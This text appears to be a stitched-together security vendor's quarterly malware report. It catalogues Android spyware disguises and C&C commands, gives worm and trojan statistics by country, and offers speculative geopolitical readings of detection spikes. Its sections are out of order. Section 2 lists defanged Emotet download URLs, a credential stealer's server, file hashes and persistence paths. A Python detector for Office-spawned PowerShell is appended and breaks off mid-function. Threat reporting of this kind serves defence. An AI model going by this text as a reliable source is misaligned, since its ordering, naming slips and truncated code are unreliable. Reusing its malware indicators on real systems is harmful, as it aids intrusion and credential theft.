4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1 Adobe Flash Player
Version 2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, as you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - get contact details and email id
Mute - set action to mute
Mms - get MMS content
info - get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018 The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are numbers 2 and 3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
In conclusion, first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information that forms the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarus society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city Kyiv on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
1 Executive summary
1.1 Overview
- In Q2 Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world.
- The malware was detected in 237 countries' top-level domains.
- Russia, Turkey and India were the countries with the highest number of worm infections.
- The United Kingdom had the highest proportion of detected backdoors.
- Ukraine and Russia were the most common countries of detection for viruses.
- Germany was the #1 country hit by trojans.
1.2 New Trends
1.2.1 Trojans jumped to the top of the malware list
The most dangerous sign is the unfolding merger of trojans and phishing emails, which amplifies the spread of malware. Attackers use trojans to deliver other malware, and the trojan surge accompanies a significant increase in other malware infections. As such, users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity.
1.2.2 Cryptominers evolved into multifunctional malware
Cryptomining decreased in quantity but grew in harmful capabilities. As events in Q2 demonstrated, this genre of malware is actively developing in two directions: better hiding and stronger persistence. Cryptominers have gained new features that let them fight antiviruses and root themselves deeply in users' systems.
1.2.3 Android malware skyrocketed in variety
In Q2 the Comodo Threat Research Labs observed a huge spike in Android malware development. Android devices have become attractive targets for cybercriminals because a modern mobile device represents a treasure trove of data. Spyware takes the lead among Android malware types. Like real-world spies, Android spyware constantly changes guises and methods of avoiding detection, and its harmful potential goes up with every new version.
1.2.4 Geopolitical intelligence
Cyberattacks and malware spikes are often correlated with significant events in world politics. The appointments of the US Secretary of State and CIA Director, Armenia's political revolution, the Donald Trump and Vladimir Putin summit in Helsinki, the Champions League final in Ukraine, US-South Korean joint military exercises, the anniversary of the 1989 Tiananmen Square protests and other events during Q2 2018 clearly demonstrate the existence of such correlations.
2 Trojans going on the offensive to hunt for confidential data
The second quarter of 2018 brought a sudden change in malware competition: trojans squeezed out other malware types and jumped to the top of the charts. Gaining the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape. Their rise forces cybersecurity departments and individual users to update their defense tactics.
Malware Distribution by Type
Why are these changes inevitable?
Trojans are a special kind of malware. Their distinguishing feature is universality: they are most effective at providing a diversity of attacks, stealing data, implanting ransomware, adware or cryptominers, or even completely crashing systems.
Another special feature of trojans is covert activity. The owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.
Hence the need for a new approach to defense tactics. Let's have a closer look at the most active vicious players on the trojan team to understand in depth what harm they can do to your computers if they sneak inside.
Distribution of top 30 Malware Families
In this list of the top 30 malware families, where trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.
For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. And the downloaded malware can be of any type.
Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website to infect users with other types of malware.
TrojWare.JS.Faceliker just clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".
TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' Command-and-Control server.
TrojWare.Win32.Injector uses process injection as its main technique to take malicious actions. It is mostly used to bypass security products.
TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via a phishing email.
Such diversity of malicious activity by trojans and their special ability to hide have always made them one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.
First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.
The accompanying graph shows the most popular malware spread via email. Note that 18 of the 20 are trojans.
Distribution of Phishing Families of Malware
2.1 The Most Widespread Trojan
The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.
If a user takes the bait and runs the file, it copies itself to %APPDATA% as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.
It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients. Then it sends all the collected data to the attackers' server at httpcallbedmlpackfarefrephp.
The phishing email
2.2 PowerShell-based attack with Emotet
Another alarming trend is related to malware itself rather than its delivery method. Often cybercriminals use malware based not on native Windows exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.
Emotet is one of the most aggressive trojans currently acting in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.
The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice the message is written in a cheerful manner to inspire user trust.
The phishing email
The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special option to convince the victims to turn on VBScript execution.
The special option used to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell.
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of writing, only the thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service named "lanesviewer" to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
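Both chains described in sections 2.1 and 2.2 leave signals in endpoint telemetry: Injector launching a hex-named copy of itself from %APPDATA%, and Emotet's Office document spawning PowerShell before a service is installed from SysWOW64. The detector below is an added example, not Comodo's code: the event records, their field names (including the "signer" field) and the "Scanned_Document.exe" parent are constructed to resemble process-creation and service-install telemetry, not a real log format.

```python
import re

# Parent/child pairs and paths that the two chains make visible.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Injector's dropped file is named D5E2DEE36C7A.exe: a bare hex string.
HEX_NAME = re.compile(r"^[0-9a-f]{8,}\.exe$", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
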